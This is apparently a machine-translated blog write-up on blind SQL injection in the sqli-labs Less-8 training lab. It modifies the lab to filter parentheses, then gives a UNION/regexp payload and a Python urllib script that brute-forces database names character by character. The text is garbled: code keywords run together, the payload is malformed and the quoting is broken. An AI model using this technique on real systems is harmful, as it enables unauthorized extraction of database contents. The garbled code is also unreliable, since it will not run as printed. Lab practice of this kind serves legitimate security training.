0x00 Environment Construction
Sqli-labs Eighth, simply modify the source code, add the following line of code
$id =preg_replace ('/\ (|\)/', ' ", $id); Filter parentheses
0x01 Script Writing
1. Construction payload
' Union select Information_schema.tables from ' where table_schema regexp binary ' ^%s.*$ '---
2. The script is as follows
#Coding=utf-8ImportUrlliburl="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"
#测试payloadpayload="' and 1=2 Union select from information_schema.tables where table_schema regexp binary ' ^%s.*$ '---"#简单测试字典, here you can use String.printablelist='abcdefghijklmnopqrstuvwxyz'#递归暴库defCheck (str): forChinchlist:payloads=payload% (str+ch)ifCheck1 (payloads):Printstr+ch Check (str+ch) #判断正则匹配结果是否正确defCheck1 (str1): Resp=urllib.urlopen (url%str1). Read ()if " You is in" inchresp:returnTrueElse: returnFalseif __name__=="__main__": Check ("")
Script execution Partial results
Python learns to bypass parentheses after filtering the blinds